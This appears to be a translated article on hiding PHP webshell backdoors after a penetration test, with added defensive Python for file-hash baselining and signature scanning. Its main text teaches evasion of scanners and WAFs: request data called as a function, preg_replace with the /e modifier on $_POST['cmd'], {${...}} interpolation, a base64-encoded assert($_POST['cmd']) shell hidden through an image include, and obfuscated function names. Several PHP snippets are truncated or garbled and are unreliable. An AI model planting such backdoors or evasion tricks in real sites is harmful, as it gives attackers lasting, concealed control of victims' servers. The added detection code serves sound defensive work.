0×00 Preface
After a successful penetration test you usually want to keep your access for a while, so leaving a backdoor is an important step. The backdoors that get deployed include, but are not limited to, database privileges, web privileges and system user accounts. This article explains some of the ideas behind hiding common web backdoors.
It takes PHP web backdoors as the example, in the hope of prompting better ideas from others.
The most common one-line backdoor is written in one of a few nearly identical forms; they differ only in which function is called. For the functions PHP has disabled on a given host, check disable_functions in php.ini.
But operations staff have many straightforward ways of spotting our shell, for example:
◆ Spotting anomalies in file name, modification time or size, or comparing the tree against a file backup
◆ Running a WEBSHELL backdoor scanning script such as Scanbackdoor.php, Pecker or shelldetect.php, or any of the various scanners
◆ Locating the backdoor through the Access.log access log
◆ Or our test request is blocked by the WAF, which leaves a warning log, and so on
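The first bullet, comparing the tree against a backup, is the check that does not depend on what the shell looks like. As an added example that is not part of the original article, here is a Python baseline-and-compare routine that hashes every file under a web root and reports files that were added, removed or changed; the directory layout and file contents in demo() are constructed for the example. It also shows why content hashes rather than modification times should drive the comparison: the tampered file's timestamps are restored afterwards, and a pure mtime check would still pass.

```python
import hashlib
import os
import tempfile


def _sha256(path):
    """Stream a file through SHA-256 so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's path (relative to root, '/' separated) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = _sha256(full)
    return manifest


def diff_manifests(baseline, current):
    """Return the added, removed and modified paths between two manifests."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed web root: take a baseline, then simulate a tampered deployment."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "inc"))
        os.makedirs(os.path.join(root, "uploads"))
        # Constructed sample files standing in for a small application.
        originals = {
            "index.php": "<?php echo 'home'; ?>\n",
            "inc/config.php": "<?php $db_name = 'app'; ?>\n",
        }
        for rel, body in originals.items():
            with open(os.path.join(root, rel), "w") as f:
                f.write(body)
        baseline = build_manifest(root)

        # Simulated tampering: append to one file but restore its timestamps,
        # and drop a new file into the upload directory.
        cfg = os.path.join(root, "inc", "config.php")
        st = os.stat(cfg)
        with open(cfg, "a") as f:
            f.write("// constructed change\n")
        os.utime(cfg, ns=(st.st_atime_ns, st.st_mtime_ns))
        with open(os.path.join(root, "uploads", "avatar.jpg"), "wb") as f:
            f.write(b"\xff\xd8\xff constructed-bytes")

        current = build_manifest(root)
        result = diff_manifests(baseline, current)
        # True here: an mtime-only comparison would have missed the change.
        result["mtime_unchanged"] = os.stat(cfg).st_mtime_ns == st.st_mtime_ns
        return result


if __name__ == "__main__":
    print(demo())
```

The baseline should be taken from a known-good deployment and stored off the web host; a manifest that lives next to the files it describes can be rewritten along with them.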
With these common detection methods in mind, the following sections summarise seven common techniques for hiding a shell.
0×01 Evasion
Read the code of any backdoor scanner and you will see that leaving a keyword that everyone knows and every scanner flags is simply not acceptable in a shell.
Common keywords include:
◆ System command execution: system, passthru, shell_exec, exec, popen, proc_open
◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
◆ File inclusion and file access: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
In the past a friend cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately that no longer slips past scanners, but the situation keeps changing, and there are endless ways to construct a call.
tudouya gave a construction technique on FreeBuf (http://www.freebuf.com/articles/web/33824.html) that builds the call by construction; if the result is too obvious, it can be written in a less direct form.
Two PHP features make this work: {} parses the variable content inside a double-quoted string, and @ suppresses the error and lets execution continue.
Now you can start constructing the hidden backdoor. Here the construction relies on command execution caused by a function, and that function is, yes, preg_replace:
```php
preg_replace("//e", $_POST['cmd'], "");?>
```
This executes without being flagged. How it executes is obvious: after the regular-expression match, the {${phpinfo()}} passed into funfunc causes code execution.
```php
funfunc("{${phpinfo()}}")
$_GET['cmd'].
```
Everyone has tried every form of file inclusion, but there are techniques for inclusion too. An ordinary file inclusion might just be an include of a particular txt or jpg, or even leaving an include vulnerability directly, but a scanner finds that easily, and an extra included file is also easy to find.
Look at this script:
```php
if(@isset($_GET[content]))
'cGx1Z2luX20ucGhw'),w),
base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
'');?>
```
It can be seen that this image backdoor relies on the e modifier of preg_replace, on PHP's variable parsing and execution, and on base64 encoding; finally it relies on file identification to assemble the complete shell. It can be regarded as a beginner's example of hiding a backdoor, and a small reminder for newcomers.
Of course, as long as there is an include point, the included file can take many forms, even error_log (although you may want to consider closing that one). Only the unexpected...
0×04 Hiding
To keep visitors from recognising the backdoor once they have found the file, clever security researchers also obfuscate the code so that it is hard to read, for example by padding a function name with extra characters:
```php
stwrw_wrwepwlwawcwe");
```
To sum up the methods above: most of them are nothing more than the process of constructing a vulnerability. Code constructed around a vulnerability can be as strange as you like; you can make it delicate and elegant or simple and crude, but the situations they suit differ. It is not difficult to combine these ideas and build your own hidden shell. The above is just a summary of experience; if you have interesting ideas, please share them.
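The keyword list in 0×01 and the constructions that follow it (preg_replace with the /e modifier, {${...}} interpolation, request data used as a function name, base64 literals, and inclusion of image or text files) are exactly what a scanner has to key on beyond plain function names. As an added example that is not part of the original article, here is a small Python line scanner written from the defender's side: the signature table, its labels and the sample files are my own constructions, and the samples reuse only the constructs shown in the article so the test can show which signature catches each one and that a plain keyword match alone catches none of them.

```python
import re

# Signature table (constructed for this example): (label, pattern tried per line).
SIGNATURES = [
    # Plain keyword match on the functions the article lists.
    ("dangerous-call",
     re.compile(r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(")),
    # Request data used as the function name, e.g. $_POST[0]($_POST[1]).
    ("superglobal-as-callable",
     re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(")),
    # preg_replace whose pattern literal carries the /e modifier (replacement is evaluated).
    ("preg_replace-e-modifier",
     re.compile(r"preg_replace\s*\(\s*(['\"])[^'\"]*/[A-Za-z]*e[A-Za-z]*\1")),
    # "{${expr}}" inside a double-quoted string: expr runs when the string is parsed.
    ("curly-interpolation", re.compile(r"\{\$\{")),
    # base64_decode applied to a long literal rather than a variable.
    ("base64-literal",
     re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{24,}['\"]")),
    # include/require of something that is not PHP source (image, text, log).
    ("include-non-php",
     re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*\.(?:jpe?g|png|gif|txt|log)\b", re.I)),
]

# Constructed sample files. "benign.php" uses the same functions legitimately;
# the others each contain one construct from the article, nothing more.
SAMPLES = {
    "benign.php": "<?php\n$out = preg_replace('/\\s+/', ' ', $in);\n"
                  "echo base64_decode($_GET['q']);\ninclude 'header.php';\n",
    "var-func.php": "<?php\n$_POST[0]($_POST[1]);\n",
    "preg-e.php": "<?php\npreg_replace(\"//e\", $_POST['cmd'], \"\");\n",
    "curly.php": "<?php\nfunfunc(\"{${phpinfo()}}\");\n",
    "image-include.php": "<?php\ninclude 'uploads/avatar.jpg';\n",
    # The literal below is base64 of the alphabet, chosen so the sample is inert.
    "b64.php": "<?php\n$cfg = base64_decode('QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=');\n",
}


def scan_source(src):
    """Return [(line_number, label)] for every signature hit, in file order."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for label, pattern in SIGNATURES:
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


def scan_samples():
    """Run the signatures over the constructed samples; map file name -> labels."""
    return {name: [label for _, label in scan_source(src)]
            for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, labels in scan_samples().items():
        print(f"{name}: {labels or 'clean'}")
```

None of the article's samples trips the dangerous-call signature, which is the whole point of the evasions; each is caught only by the signature written for that construct, and padded names such as the str_replace variant above are not matched at all. Signature scanning therefore belongs alongside the file-baseline comparison, not in place of it.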
This article introduced PHP backdoor hiding and maintenance techniques and the related background; I hope it is helpful to readers interested in PHP.